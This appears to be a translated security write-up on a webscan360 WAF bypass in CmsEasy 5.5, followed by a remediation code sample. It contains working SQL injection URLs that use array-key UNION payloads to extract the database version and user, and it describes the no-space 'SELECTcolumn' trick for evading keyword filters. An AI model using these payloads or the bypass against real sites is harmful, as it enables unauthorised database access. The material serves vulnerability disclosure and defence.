Here we need to talk about the latest version of CmsEasy. First let us test one thing. In MySQL, `select tname,1,2,3,4 from table` is a statement everyone will agree executes. Now remove the space between `select` and `tname` and see whether the statement still runs. We test it against CmsEasy's own database: `SELECTcatid FROM cmseasy_archive WHERE 1`
See that? It executed perfectly. During the earlier audits of CmsEasy: the first time, `union select 1,2,3,4 from t` was automatically blocked by webscan360. The second time, `union select/**/1,2,3,4 from t` bypassed webscan360 and executed successfully. The third time, this spot had been patched for the previous webscan360 bypass; retesting the second case here, it is blocked, so we will not demonstrate it again. So is our guess correct, and will `union selecttname,1,2,3,4 from t` also execute successfully? Look straight at the code, archive_act.php:
} elseif (front::get(front::check_type('aid'))) {
    // aid passes through check_type() before it reaches the query
    $this->view->archive = archive::getInstance()->getrow(front::get('aid'));
    $this->view->categorys = category::getpositionlink2($this->view->archive['catid']);
    $this->view->paylist = pay::getInstance()->getrows('', 50);
    $this->view->logisticslist = logistics::getInstance()->getrows('', 50);
    $prices = getPrices($this->view->archive['attr2']);
    $this->view->archive['attr2'] = $prices['price'];
    if (!is_array($this->view->archive))
        $this->out('message/error.html');
    if ($this->view->archive['checked'] < 1)
        exit(lang('未审核!'));
    if (!rank::arcget(front::get('aid'), $this->view->usergroupid)) {
        $this->out('message/error.html');
    }
Here `front::get(front::check_type('aid'))` sanitizes the parameter, so the injection itself has been fixed. What we want to test is webscan360, so we skip this logic and change the condition to:
} elseif (true || front::get(front::check_type('aid'))) {
    // condition short-circuited for the test so the branch is always entered
    $this->view->archive = archive::getInstance()->getrow(front::get('aid'));
    $this->view->categorys = category::getpositionlink2($this->view->archive['catid']);
We visit the URL: **.**.**.**/CmsEasy_5.5_UTF-8_20141015/uploads/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=1
Then we visit the URL: **.**.**.**/CmsEasy_5.5_UTF-8_20141015/uploads/index.php?case=archive&act=orders&aid[typeid%60%3d1%20UNION%20SELECTtypeid,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=1
Bypassed successfully!!!
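As an added example (not CmsEasy's own code; the body of `front::check_type()` is not shown on the page, so `check_aid()` below is an assumed equivalent), this is the positive validation that makes the `aid` parameter independent of whatever keyword spacing the WAF does or does not match: the value must be a scalar decimal id, the `aid[...]=1` array form is rejected outright, and the id is bound as a prepared-statement parameter rather than concatenated into SQL.

```php
<?php
// Added example, not CmsEasy code. check_aid() stands in for the page's
// front::check_type('aid'); its real implementation is not shown on the page.

/**
 * Return the article id from the request as an int, or null when the
 * parameter is missing, is an array, or is not a plain positive integer.
 * Arrays are refused because aid[<key>]=1 moves attacker text into the
 * array key, where a filter that only inspects values never sees it.
 */
function check_aid(array $request, string $name = 'aid'): ?int
{
    if (!array_key_exists($name, $request)) {
        return null;
    }
    $value = $request[$name];
    if (is_array($value) || (!is_string($value) && !is_int($value))) {
        return null;
    }
    // Digits only: no spaces, comments, quotes or backticks can survive this.
    if (!preg_match('/^[1-9][0-9]{0,9}$/', (string) $value)) {
        return null;
    }
    return (int) $value;
}

/** Fetch the row with a bound parameter so the id never becomes SQL text. */
function get_archive(PDO $pdo, int $aid): ?array
{
    $stmt = $pdo->prepare('SELECT * FROM cmseasy_archive WHERE aid = :aid LIMIT 1');
    $stmt->execute([':aid' => $aid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a legitimate request and the two array-form payload
// shapes from the page (shortened). Only the first yields an id.
$cases = [
    ['aid' => '42'],
    ['aid' => ['typeid`=1 UNION SELECT/**/1,2,3 from cmseasy_archive ORDER BY 1#' => '1']],
    ['aid' => ['typeid`=1 UNION SELECTtypeid,2,3 from cmseasy_archive ORDER BY 1#' => '1']],
];
foreach ($cases as $req) {
    $aid = check_aid($req);
    echo $aid === null ? "rejected\n" : "accepted id {$aid}\n";
}
```

With this in place the branch at the top of the page can call `get_archive($pdo, $aid)` only when `check_aid()` returned a non-null id, and the WAF becomes a second layer rather than the only one.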